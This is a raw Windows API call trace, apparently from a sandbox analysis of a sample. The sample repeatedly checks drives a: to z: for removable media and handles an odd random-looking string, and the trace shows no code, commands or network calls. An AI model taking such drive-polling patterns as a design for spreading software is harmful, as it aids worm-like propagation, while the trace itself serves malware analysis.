CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.008] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.008] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.008] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.008] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.008] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.008] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.008] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.009] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.010] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.011] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.011] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.011] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.011] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.011] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.012] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326120 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326120 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0214.012] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0214.012] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.012] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.012] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.012] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.013] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.013] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0214.013] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.013] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.013] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.013] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.013] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.013] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.237] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.238] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.238] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.238] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.238] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.239] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.239] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.239] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.239] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.240] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.240] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.240] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.240] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.240] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.241] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.241] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.241] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.241] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.242] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.242] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.242] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.242] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.243] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.243] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0214.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.243] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0214.243] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.244] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.244] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.244] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.244] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.244] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.244] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.245] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.245] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.245] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.245] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.245] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.245] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.245] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.246] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.246] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.246] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.246] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.246] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.247] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.248] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.248] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.248] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.248] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.248] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.249] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.249] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.250] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.250] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.250] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.250] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0214.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.251] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.251] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0214.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0214.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.252] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.252] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.252] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.253] 